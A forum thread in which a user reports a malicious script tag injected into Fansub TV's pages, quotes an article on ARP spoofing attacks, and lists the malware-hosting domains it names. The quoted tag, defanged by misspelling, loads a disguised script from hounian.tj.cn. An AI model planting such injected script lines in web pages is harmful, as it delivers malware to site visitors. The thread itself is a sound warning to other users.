ARP spoofing attack on Fansub TV's network?

NinjaDuck

-chi
Kouhai
The last few days I've only been getting half a page of garbage text most times when trying to access Fansub TV. When looking at the source code a suspicious command precedes the gobbledegook:

CODE <skript src=http://hounian.tj.cn/count/js/gif.gif></skript>

(i mispelled 'script' on purpose here to prevent accidental parsing)

When checking my cache the "gif" is really some script to (amongst other things) launch one of two Flash programs. I initially wondered if this was just a poor choice of advertisement provider, but then found the following story when googling the dodgy-looking .cn site name.

--
http://windowsitpro.com/article/articleid/...s-underway.html

June 03, 2008
ARP Spoofing Attacks Underway

It seems that there's a barrage of ARP spoofing attacks taking place on various networks. In some cases the attacks eventually lead to installation of malware, in other cases the attacks make it appear that a site was hacked when in reality it was not.

Earlier this week the network hosting metasploit.com came under such an attack. Today one of my customers fell victim the same sort of attack when their hosting company was attacked with ARP spoofing.

In the latter case traffic was redirected to sites in China that host malware. After a little research I discovered that others are experiencing similar situations.

So if your sites appear to become victims of similar attacks get your hosting company to check into their ARP tables. Also, consider blacklisting these domains since they are sometimes the places used to host malware in these particular attacks - at the moment anyway:

crazysb.cn
hounian.tj.cn
51yes.com
--

I found several files cached from hounan and 51yes after my latest Fansub TV redirection, including a couple that'd had great pains taken to obfuscate their source code from casual observation or scanner heuristics. (A simple matter to reconstruct the true source code because their unscramble algorithm is plainly visible.)
I think I might also check the "gobbledegook" of the redirect page in a hex editor tomorrow and see if it contains a gzip header or something.. In the meantime u might wanna fire up your fave malware scanner and do a full system check...
ohmy.gif
P~

Have fun and mung beans,
Luv Duck

Mod's note: Thank you very much for the info.
smile.gif
The admin has been alerted to it.
 
Playasia - Play-Asia.com: Online Shopping for Digital Codes, Video Games, Toys, Music, Electronics & more
Top